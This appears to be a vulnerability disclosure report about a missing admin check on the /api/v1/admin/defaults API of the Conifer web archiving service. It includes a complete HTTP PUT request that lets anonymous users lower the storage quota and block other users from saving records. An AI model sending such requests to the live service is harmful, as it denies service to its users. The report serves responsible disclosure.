Description

In admincontroller.py file, all APIs will perform user permission checks using admin_view function to avoid access from low-level users. However, this does not apply to API /api/v1/admin/defaults. Anonymous users can change max_size configuration which prevents other users from creating records.

Proof of Concept

• Step 1: First, I create two accounts asdmigs78j56436 and asdmigs78j56436. When retrieving information from the API /api/v1/auth/curr_user, the value of max_size variable is 500000000.
• Step 2: Set value for max_size via API /api/v1/admin/defaults

PUT /api/v1/admin/defaults HTTP/2
Host: conifer.rhizome.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close

{"max_size":"1000",
"max_anon_size":"1000"}

• Step 3: Create new account asdmigs78j56437. When retrieving information from the API /api/v1/auth/curr_user, the value of max_size variable is 1000. Create a new record, you will very quickly reach the maximum limit.

Note: I adjusted max_size back to the original value of 500000000

• PoC:

Real max_size: https://drive.google.com/file/d/1JEo6MY-TGEfAUSalQwzegpOlbyukaF7p/view?usp=sharing

Change max_size: https://drive.google.com/file/d/1kfHhIDnC-coQ_AjZzRG5uY8PfYVjRpmU/view?usp=sharing

Reach limit: https://drive.google.com/file/d/1bMVclDzfQzsnzPIOeazC_zn7s2N7ka0r/view?usp=sharing

Impact

Improper Privilege Management. Anonymous users can change max_size configuration which prevents other users from creating records.